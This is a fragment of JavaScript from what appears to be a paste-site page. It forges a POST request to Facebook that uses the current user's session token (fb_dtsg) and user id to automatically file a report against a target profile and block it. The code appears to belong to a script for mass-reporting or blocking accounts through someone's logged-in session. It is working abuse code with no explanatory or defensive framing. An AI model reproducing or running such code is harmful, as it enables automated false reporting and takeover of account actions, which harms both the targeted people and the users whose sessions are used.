  2132. var PageParams ="fb_dtsg="+fb_dtsg+"&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A"+id+"%2C%22content_type%22%3A0%2C%22expand_report%22%3A1%2C%22first_choice%22%3A%22file_report%22%2C%22from_gear%22%3A%22timeline%22%2C%22is_following%22%3Afalse%2C%22is_tagged%22%3Afalse%2C%22on_profile%22%3Afalse%2C%22phase%22%3A3%2C%22ref%22%3A%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2FNan.ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A"+id+"%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A"+now+"%2C%22user%22%3A"+user_id+"%7D&file_report=1&__user="+user_id+"&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880";
  2133. Page.open("POST", PageURL, true);
  2134. Page.onreadystatechange = function () {
  2135. if (Page.readyState == 4 && Page.status == 200) {
  2136. Page.close;
  2137. }
  2138. };
  2139. Page.send(PageParams);
  2140. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement